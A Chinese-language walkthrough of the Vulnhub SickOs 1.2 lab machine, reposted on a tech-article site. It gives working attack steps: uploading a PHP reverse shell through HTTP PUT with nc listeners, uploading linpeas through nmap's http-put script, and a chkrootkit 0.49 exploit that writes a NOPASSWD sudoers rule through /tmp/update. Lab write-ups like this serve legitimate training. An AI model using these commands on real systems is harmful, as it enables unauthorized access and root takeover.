IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> vulnhub SickOs: 1.2 -> 正文阅读

[PHP知识库]vulnhub SickOs: 1.2

渗透思路:

nmap扫描---->dirb扫描---->通过PUT方法上传php反弹shell---->利用chkrootkit漏洞提权

环境信息:

靶机ip:192.168.101.39

攻击机ip:192.168.101.34

具体步骤:

步骤1:nmap扫描

sudo nmap -sS -A -p- 192.168.101.39

扫描到22端口(ssh)和80端口(http)

步骤2:dirb扫描网站目录

dirb http://192.168.101.39 

除了网站主目录http://192.168.101.39/index.php,只扫到一个目录http://192.168.101.39/test/

访问一下网站主目录,发现就一张图,查看源代码也没什么线索

访问一下?http://192.168.101.39/test/发现是一个目录,目录是空的,另外还印证了一下nmap扫描结果,网站服务器是lighttpd 1.4.28。

步骤3:通过PUT方法上传php反弹shell

在网上找到的lighttpd 1.4.28历史漏洞没有getshell的,但我想或许可以通过目录遍历漏洞来获取什么敏感文件信息,里面或许有线索。尝试了许久,没有成功。

后来尝试访问http://192.168.101.39和http://192.168.101.39/test/的时候,burpsuite抓包,并将请求报文中的请求方法从GET换成PUT,只要这两个url中有支持PUT方法的,就可以上传shell。

http://192.168.101.39的请求报文的请求方法换成PUT之后,返回报文和GET的完全一样,尝试在url之后加文件名,比如http://192.168.101.39/shell.php,则会报404。这恐怕不行。

http://192.168.101.39/test/的请求报文中,先把请求方法换成OPTIONS(虎一点也可以省略这步),可以确定这个url是支持PUT方法的。

接下来修改请求报文,请求方法修改为PUT,url修改为?http://192.168.101.39/test/shell.php,请求头下面空一行,把kali linux上的/usr/share/webshells/php/php-reverse-shell.php的内容复制进来,改一下$ip和$port(分别改成攻击机ip和监听端口)。

发送之后再访问http://192.168.101.39/test/,发现该目录下已经有了一个文件shell.php

攻击机上用nc监听2333端口

nc -nlvp 2333

访问?http://192.168.101.39/test/shell.php 触发反弹shell,没想到居然失败啦…………

换了好几个端口号,最后发现监听443端口的时候能成功

nc -nlvp 443

访问?http://192.168.101.39/test/shell4.php 触发反弹shell

反弹shell中输入以下命令,得到交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

步骤4:利用chkrootkit漏洞提权

传输提权检测脚本linpeas.sh的时候遇到了问题,用步骤3中的方法,也就是通过burpsuite上传的linpeas.sh运行时报错。

而由于之前已经发现靶机连接很多外部端口是不允许的,因此用wget也不大行。

而通过curl命令上传linpeas.sh的时候,由于curl会先发送一个带Expect头的报文,而lighttpd不支持这个头,因此无法上传成功。

curl -v -X PUT -T /home/kali/linpeas.sh http://192.168.101.39/test/linpeas.sh

?最后现学了一个方法,通过nmap上传,终于上传成功了

sudo nmap -p 80 192.168.101.39 --script http-put --script-args http-put.url='/test/linpeas.sh',http-put.file='linpeas.sh'

上传成功后,在靶机的/var/www/test目录下执行以下命令,使linpeas.sh可执行。

chmod +x linpeas.sh

然后执行linpeas.sh

./linpeas.sh

linpeas.sh也没找到啥一眼看上去就有利用空间的东西……

定时任务这块,一堆绿色(正常)的中间有三个白色的,似乎有点东西

在攻击机上用searchsploit把这三个的exploit都search一遍,apt-xapian-index的没找到,lighttpd的没有本地提权相关的漏洞,chkrootkit倒是有

searchsploit chkrootkit

版本要求0.49。

靶机上查询?chkrootkit 版本,发现靶机上的chkrootkit的版本是0.49,这不是巧了

chkrootkit -V

我们用33899.txt那个exploit,找一下它在本地的存储位置

searchsploit -p 33899.txt

?

?看一下它的内容

cat /usr/share/exploitdb/exploits/linux/local/33899.txt 

?有教手工利用的方法:

在/tmp文件夹下新建一个名为update的文件,并以root的身份执行chkrootkit,那么/tmp/update就会被root用户执行。

看到一种比较方便的利用方法,是在/tmp/update中写入修改/etc/sudoer文件的内容,使www-data用户可以免密码以任何用户的身份执行sudo命令。

具体命令如下,其中chmod 444 /etc/sudoers只是为了方便观察/tmp/update是否被执行(因为 /etc/sudoers原本的权限是440),提权成功后记得把权限改回来

echo 'echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 444 /etc/sudoers' > /tmp/update

查看一下?/tmp/update的内容

给?/tmp/update 可执行权限

chmod +x /tmp/update

很快,/etc/sudoers的权限就变成444了

执行

sudo su

发现报错。原来sudoer的权限必须是0440啊……

那再把sudoer的权限改回来

echo 'echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

很快(不到一分钟),执行 sudo su就可以获得root权限,flag在/root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt中

?

?

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-01-16 12:49:24  更:2022-01-16 12:49:38 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 14:52:29-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码